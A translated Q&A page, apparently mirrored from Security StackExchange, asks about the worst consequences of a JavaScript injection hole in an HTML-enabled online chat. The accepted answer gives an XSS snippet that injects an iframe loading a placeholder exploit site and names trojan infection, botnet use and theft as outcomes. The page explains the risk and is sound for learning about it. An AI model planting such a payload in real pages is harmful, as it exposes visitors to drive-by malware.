首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >在线聊天中Javascript漏洞的安全后果?

在线聊天中Javascript漏洞的安全后果?
EN

Security用户
提问于 2013-06-01 23:29:33
回答 1查看 222关注 0票数 4

对于允许基本HTML的在线聊天,如果它们为潜在的黑客对聊天中的每个人执行javascript留下了一个开放的途径,会发生什么?

他们能做的最糟糕的事是什么?

EN

回答 1

Security用户

回答已采纳

发布于 2013-06-01 23:48:45

创建新的iframe和加载开发工具包内的iframe。

代码语言:javascript
复制
<script language="JavaScript" type="text/javascript">
ifrm = document.createElement("IFRAME");
   ifrm.setAttribute("src", "http://exploitsite.com/");
   ifrm.style.width = 640+"px";
   ifrm.style.height = 480+"px";
   document.body.appendChild(ifrm);
</script>

用木马感染用户,把他们当作机器人,偷他们的钱等等。

票数 4
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/36804

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档